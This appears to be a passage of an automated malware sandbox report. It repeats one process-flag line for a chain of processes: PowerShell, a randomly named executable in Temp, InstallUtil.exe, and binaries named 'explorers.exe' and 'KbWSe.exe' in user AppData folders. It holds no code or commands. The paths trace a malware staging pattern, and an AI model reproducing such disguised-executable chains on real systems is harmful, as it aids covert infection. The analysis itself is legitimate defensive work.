                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
